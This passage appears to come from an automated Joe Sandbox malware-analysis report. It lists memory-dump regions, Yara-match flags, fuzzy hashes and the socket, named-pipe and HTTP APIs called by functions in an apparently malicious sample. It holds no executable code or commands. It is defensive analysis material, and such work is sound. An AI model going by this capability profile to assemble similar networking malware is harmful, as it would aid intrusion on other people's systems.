                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free
                        • String ID:
                        • API String ID: 1294909896-0
                        • Opcode ID: c765d2767cc6881341997e71bcd018a989170b9b961d50c461c72776cf572830
                        • Instruction ID: 43370a116c173664ebe0b096be96bb6f244fc0b185e332cefd7afb703bb69b2d
                        • Opcode Fuzzy Hash: c765d2767cc6881341997e71bcd018a989170b9b961d50c461c72776cf572830
                        • Instruction Fuzzy Hash: 8FE1C672308AC29ADB20CB27E4902AE73B1F795788F914115EF5D87758EF38DA46CB41
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free
                        • String ID:
                        • API String ID: 1294909896-0
                        • Opcode ID: 037a88b3a0e0121372c1e8929510804f124a0a98294513f128062ea9428e9fbd
                        • Instruction ID: 52e2b2a396331a14f82d648ec58310da7abf35876b31bce3a8f714279d3d7fcb
                        • Opcode Fuzzy Hash: 037a88b3a0e0121372c1e8929510804f124a0a98294513f128062ea9428e9fbd
                        • Instruction Fuzzy Hash: 48E1C172718A4297DF20DF26E5902AFA3A1F794798F904115FA8D87B58EF78CD05CB40
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
                        • Instruction ID: fb76d8cee692e57bd5eb4cf69b4e792b2775c20c98bdf17a775faff45a535e62
                        • Opcode Fuzzy Hash: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
                        • Instruction Fuzzy Hash: AEE19E76B10B4187EB24CB75ED413AA63A2F789795F488125EB8E97B51EF3CE485C300
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free
                        • String ID:
                        • API String ID: 1294909896-0
                        • Opcode ID: 1cd785112f09a1c6710790546be46074dbf73f7ffcb36dc8c2022c63c2ed85fc
                        • Instruction ID: 08384710fc487208dd5b6ecd365000191150edc5647ae0dce0eebb2f38d499c4
                        • Opcode Fuzzy Hash: 1cd785112f09a1c6710790546be46074dbf73f7ffcb36dc8c2022c63c2ed85fc
                        • Instruction Fuzzy Hash: F4D12873308BC296DF20DB67E8902AE6761F794788F810112EF5E97A58EF35DA46C740
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free
                        • String ID:
                        • API String ID: 1294909896-0
                        • Opcode ID: a24fb40c631e4fb8bf858a82f26ba5d2e30cdac9459d39304e37b5ee64eada3e
                        • Instruction ID: 42c0e34cb9b76e24ec5c92662a4c9c6100d3903b77b115927b08dbef2a2b64c3
                        • Opcode Fuzzy Hash: a24fb40c631e4fb8bf858a82f26ba5d2e30cdac9459d39304e37b5ee64eada3e
                        • Instruction Fuzzy Hash: C0D1D072704E8292DF20DF65E9912AFA761F794788F900112FE4E97A58EFB8C946C740
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
                        • Instruction ID: ee076d2210cbe3c96fbb69a746ff294b550a910ed38adc1aa3fd837bd0457d2e
                        • Opcode Fuzzy Hash: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
                        • Instruction Fuzzy Hash: 3661B87A718B40C6EB208F22E984B1E77B0F789B94F185129EB4D87B14DF7DC8949B41
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                        • Instruction ID: f5cebe716af2c80873aded6f79960900ef4ed4bc5ceebe86aca9a1de75d6b6f0
                        • Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                        • Instruction Fuzzy Hash: 15511DB6214A509BD714CB0DE4E076AB7E2F3CCB94F84521AE38B87768DA3CD545CB50
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e9f3c8d7c0dc9eb8d9f57432a08b52b5443182a39e6687ec2325468b76bc3f04
                        • Instruction ID: 930aacb92f11247601ac47d832533702241d5b266a531ff47749821d0fabbfea
                        • Opcode Fuzzy Hash: e9f3c8d7c0dc9eb8d9f57432a08b52b5443182a39e6687ec2325468b76bc3f04
                        • Instruction Fuzzy Hash: A2011B8BE4DFE145F26341681C5A28A1F80E7D39BDF0C43DBBE704A3DB9649598AC319
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 37212c03cd9bceab84b252eb73883c4191cfd661bc6eedc1c8d23eae7eafda83
                        • Instruction ID: 0ccd7187033b76a8e4e863b4bebedbb7c83bd3848910addd799ee8cda45a9dbf
                        • Opcode Fuzzy Hash: 37212c03cd9bceab84b252eb73883c4191cfd661bc6eedc1c8d23eae7eafda83
                        • Instruction Fuzzy Hash: EFD012CB90EEC16AF35741AC1C761EE2E9195A3F7431E434A8BB0462EBAE130C619365
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 106eb1b0f72589fea2580a2fb61f8e81a881fd0116f6b3c70070330428cf52fb
                        • Instruction ID: aa2f221b4563580905bccf67b4f2e99f3671f333e71eac14f76e4ce65e214ed5
                        • Opcode Fuzzy Hash: 106eb1b0f72589fea2580a2fb61f8e81a881fd0116f6b3c70070330428cf52fb
                        • Instruction Fuzzy Hash: 14D0A7CBD0DBD145E11241740C2A2861F416BA39B9B0D83AF6E74473D755085C4A9318
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
                        • Instruction ID: a90e02ae8d049601286e53e7699458ba48d96224d24485149046b028ffd0d41f
                        • Opcode Fuzzy Hash: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
                        • Instruction Fuzzy Hash: 90B012A7448D1181C3000F30CC013E03334D755786F042461620440192C22CC254D10C
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: acceptioctlsocket$closesockethtonlselect
                        • String ID:
                        • API String ID: 2003300010-0
                        • Opcode ID: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                        • Instruction ID: 515b1a93a6347f00b72f0d2adbf120aa064ddd4c3a0f2e1acb9911df35890225
                        • Opcode Fuzzy Hash: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                        • Instruction Fuzzy Hash: 36918A32620B959BDB60DF65E9807AD33B1F788B98F004226EB5E47A58DF35C664CB10
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _snprintf$CloseHandleHttpInternetRequest$OpenSendSleep
                        • String ID: %s%s$*/*
                        • API String ID: 3787158362-856325523
                        • Opcode ID: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                        • Instruction ID: 0af248e44118c3e034bdc3c751d7ed3fba59c1ea3a499f8ab51f0527dc146b6d
                        • Opcode Fuzzy Hash: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                        • Instruction Fuzzy Hash: C871C272300B8896EB50DFA2E8903ED77A1F798788F500126EB5D437A4DF78C60AC760
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$CountNamedPipeTick$CreateDisconnectFileHandleSleepStateWait
                        • String ID:
                        • API String ID: 34948862-0
                        • Opcode ID: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                        • Instruction ID: e65e53a90f196d509f9d3455efb897c0e6a695dbe8e2b8aaede48007dc293331
                        • Opcode Fuzzy Hash: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                        • Instruction Fuzzy Hash: 7C419A32300F44D6EB00DBA2E8447BD3375E388BA4F504626EF2A87BA4CF39C5558711
                        APIs
                        • _errno.LIBCMT ref: 00CFFE36
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        • _invalid_parameter_noinfo.LIBCMT ref: 00CFFE42
                        • __crtIsPackagedApp.LIBCMT ref: 00CFFE53
                        • AreFileApisANSI.KERNEL32 ref: 00CFFE62
                        • MultiByteToWideChar.KERNEL32 ref: 00CFFE88
                        • GetLastError.KERNEL32 ref: 00CFFE95
                        • _dosmaperr.LIBCMT ref: 00CFFE9D
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: ApisByteCharErrorFileLastMultiPackagedWide__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                        • String ID:
                        • API String ID: 1138158220-0
                        • Opcode ID: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                        • Instruction ID: f80830eaf7b6e5d0f322300e9e2bdf7ab5dcf9bb7d26a6f8bf76e2fbfe9a5161
                        • Opcode Fuzzy Hash: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                        • Instruction Fuzzy Hash: 8421BD72300B4486EB54AF66A80433DA6E1EFC9FA4F144628EB59437E6DF7CC5118322
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                        • String ID:
                        • API String ID: 4099253644-0
                        • Opcode ID: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                        • Instruction ID: 157159ee0724258a7241aaa09f48437ea210d69c7f9327e1167a53e268e2c095
                        • Opcode Fuzzy Hash: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                        • Instruction Fuzzy Hash: B1312B75602A4885FF98EF91E89137463A0EFA5B90F58062ADE5A062A6CF7CC541D332
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
                        • String ID: d
                        • API String ID: 1257931466-2564639436
                        • Opcode ID: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                        • Instruction ID: e0e4a7d0302e8d6339790059ce887acba84e28b4bae174f7ffd4764e2bab2b4a
                        • Opcode Fuzzy Hash: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                        • Instruction Fuzzy Hash: A5318032214B85D6DB608F61E8847EA77A4F788B88F005126EF8D47B28DF79C555CB00
                        APIs
                        • _errno.LIBCMT ref: 00D06E4E
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        • __doserrno.LIBCMT ref: 00D06E45
                          • Part of subcall function 00D01CA8: _getptd_noexit.LIBCMT ref: 00D01CAC
                        • __doserrno.LIBCMT ref: 00D06EAB
                        • _errno.LIBCMT ref: 00D06EB2
                        • _invalid_parameter_noinfo.LIBCMT ref: 00D06F16
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                        • String ID:
                        • API String ID: 388111225-0
                        • Opcode ID: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                        • Instruction ID: 12a60ed41c39cafea5c43a6147627fa55d68a40e8182cafbc9cefc4c17d2fe5a
                        • Opcode Fuzzy Hash: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                        • Instruction Fuzzy Hash: D421033671035186D706AF75E88132E3A60EF81BA4F998229FE2D1B7D2CB38C8518730
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: write_multi_char$write_string$free
                        • String ID:
                        • API String ID: 2630409672-3916222277
                        • Opcode ID: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
                        • Instruction ID: 74320e16b5a18755c659eae4a6e25c90253bf7db4601d613a25c4d4837b9bace
                        • Opcode Fuzzy Hash: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
                        • Instruction Fuzzy Hash: 3591D13271878486EB21CB65E5043BE6B70F78679AF141016EF4A17B98DB39C94DCB00
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountTick$ErrorLastSleepselectsend
                        • String ID: d
                        • API String ID: 2152284305-2564639436
                        • Opcode ID: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                        • Instruction ID: 507e4d03c5040b1895811a1ed11b82328165e3c55e06b71d8041b6e950fba15a
                        • Opcode Fuzzy Hash: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                        • Instruction Fuzzy Hash: 3621D072218B84D6D760CF61F8883EE7361F788784F404226EB9D43A58CF39C568CB54
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CountErrorLastSleepTickWrite$BuffersDisconnectFlushNamedPipe
                        • String ID:
                        • API String ID: 3101085627-0
                        • Opcode ID: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                        • Instruction ID: bf4628471de05473dfde67a0ac15684ae5cba04dc2dc24b3e9375becb594b6da
                        • Opcode Fuzzy Hash: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                        • Instruction Fuzzy Hash: D031BD32700A459AEB10DFF6E8943EC3371F784B98F50012AEE1A97A28DF39C50AC350
                        APIs
                        • _errno.LIBCMT ref: 00A5624E
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        • __doserrno.LIBCMT ref: 00A56245
                          • Part of subcall function 00A510A8: _getptd_noexit.LIBCMT ref: 00A510AC
                        • __doserrno.LIBCMT ref: 00A562AB
                        • _errno.LIBCMT ref: 00A562B2
                        • _invalid_parameter_noinfo.LIBCMT ref: 00A56316
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                        • String ID:
                        • API String ID: 388111225-0
                        • Opcode ID: 9a7e94428e85d4ed5cd8e77b1af53c202f15bf406c2c29a1a7d54b8e8c205bff
                        • Instruction ID: f2bcfc4a2cc741e9734f5a27d3e72ed1052b3a679bed56d3d4c495e9d1cf5da0
                        • Opcode Fuzzy Hash: 9a7e94428e85d4ed5cd8e77b1af53c202f15bf406c2c29a1a7d54b8e8c205bff
                        • Instruction Fuzzy Hash: D921253271079486C7066F659D8233E7A20BBC1BB2FD58229EE211B7D2CB78C88DC710
                        APIs
                        • _errno.LIBCMT ref: 00D07ABB
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        • __doserrno.LIBCMT ref: 00D07AB3
                          • Part of subcall function 00D01CA8: _getptd_noexit.LIBCMT ref: 00D01CAC
                        • __lock_fhandle.LIBCMT ref: 00D07AFF
                        • _lseek_nolock.LIBCMT ref: 00D07B18
                        • _unlock_fhandle.LIBCMT ref: 00D07B39
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock_unlock_fhandle
                        • String ID:
                        • API String ID: 1078912150-0
                        • Opcode ID: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                        • Instruction ID: 10c5d50b32fbb6f8e9cb203ea84ba4c6623f623b89b0050f22dcfd1bb6f99163
                        • Opcode Fuzzy Hash: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                        • Instruction Fuzzy Hash: 7C113432B0864046E7066F69D88137DBA61FB80BA1F595219FA2D0F3E2CB78D881C735
                        APIs
                        • _errno.LIBCMT ref: 00D07C33
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        • __doserrno.LIBCMT ref: 00D07C2B
                          • Part of subcall function 00D01CA8: _getptd_noexit.LIBCMT ref: 00D01CAC
                        • __lock_fhandle.LIBCMT ref: 00D07C77
                        • _lseeki64_nolock.LIBCMT ref: 00D07C90
                        • _unlock_fhandle.LIBCMT ref: 00D07CB3
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
                        • String ID:
                        • API String ID: 2644381645-0
                        • Opcode ID: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                        • Instruction ID: b1016d0145bef90a8882ca75215e76c2dbe58ede3e43d8478e28c3c8e52b5882
                        • Opcode Fuzzy Hash: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                        • Instruction Fuzzy Hash: 0811B122B1464046FB066F29D84136D7751EB80BB1F594715AE3E1B3D2CB78D8818779
                        APIs
                        • _invalid_parameter_noinfo.LIBCMT ref: 00D0FD76
                        • _errno.LIBCMT ref: 00D0FD6B
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                        • String ID:
                        • API String ID: 1812809483-0
                        • Opcode ID: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                        • Instruction ID: 4979ba6a54f8abdf212713e1c87f731bfb6591696fa5b549c5c34f6f31100e22
                        • Opcode Fuzzy Hash: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                        • Instruction Fuzzy Hash: 7A41E17261439186DB34EB22D5403A936A1EB64BA4FB84236FB9C47FE6D738C8419730
                        APIs
                        • _invalid_parameter_noinfo.LIBCMT ref: 00A5F176
                        • _errno.LIBCMT ref: 00A5F16B
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                        • String ID:
                        • API String ID: 1812809483-0
                        • Opcode ID: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                        • Instruction ID: c836d9b8418ab4bbe29d743f0f03f4a9e56ddbb9cad34317d8f171a03e0bc33d
                        • Opcode Fuzzy Hash: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                        • Instruction Fuzzy Hash: 7C4114B66107958ADF20AB22D6412FD77A1F755BA6FA04236EF9447B84D738C8498B00
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
                        • String ID:
                        • API String ID: 3339321253-0
                        • Opcode ID: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                        • Instruction ID: d626905942885ae7719f93b701446a829d444ed33c62021690dedd1acea0a88b
                        • Opcode Fuzzy Hash: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                        • Instruction Fuzzy Hash: A031387231469496EB24DF61E8947BE6362FB84BA8F440135EF0A47798EF3CC65AC710
                        APIs
                          • Part of subcall function 00CF6BE0: htonl.WS2_32 ref: 00CF6C3D
                          • Part of subcall function 00CF6BE0: select.WS2_32 ref: 00CF6CAB
                          • Part of subcall function 00CF6BE0: __WSAFDIsSet.WS2_32 ref: 00CF6CC3
                          • Part of subcall function 00CF6BE0: accept.WS2_32 ref: 00CF6CE0
                          • Part of subcall function 00CF6BE0: ioctlsocket.WS2_32 ref: 00CF6CF8
                          • Part of subcall function 00CF6BE0: __WSAFDIsSet.WS2_32 ref: 00CF6D9B
                        • GetTickCount.KERNEL32 ref: 00CF6BAA
                          • Part of subcall function 00CF6F2C: malloc.LIBCMT ref: 00CF6F5E
                          • Part of subcall function 00CF6F2C: htonl.WS2_32 ref: 00CF6F91
                          • Part of subcall function 00CF6F2C: recvfrom.WS2_32 ref: 00CF6FD5
                          • Part of subcall function 00CF6F2C: WSAGetLastError.WS2_32 ref: 00CF6FE2
                        • GetTickCount.KERNEL32 ref: 00CF6BC2
                        • GetTickCount.KERNEL32 ref: 00CF70E0
                        • GetTickCount.KERNEL32 ref: 00CF70F6
                        • shutdown.WS2_32 ref: 00CF7115
                        • shutdown.WS2_32 ref: 00CF712A
                        • closesocket.WS2_32 ref: 00CF7134
                        • free.LIBCMT ref: 00CF7154
                        • free.LIBCMT ref: 00CF7169
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountTick$freehtonlshutdown$ErrorLastacceptclosesocketioctlsocketmallocrecvfromselect
                        • String ID:
                        • API String ID: 3610715900-0
                        • Opcode ID: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                        • Instruction ID: 1080c20038cb35faa41c071fb371d238f9ebd93b03b3991f51da40e3b3022d50
                        • Opcode Fuzzy Hash: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                        • Instruction Fuzzy Hash: 9121A032204A49C2DBA09FA2E84437D2370FB48F98F188226CF5947218DF75C9A58713
                        APIs
                        • _errno.LIBCMT ref: 00D0645F
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        • __doserrno.LIBCMT ref: 00D06457
                          • Part of subcall function 00D01CA8: _getptd_noexit.LIBCMT ref: 00D01CAC
                        • __lock_fhandle.LIBCMT ref: 00D064A3
                        • _unlock_fhandle.LIBCMT ref: 00D064DD
                        Memory Dump Source
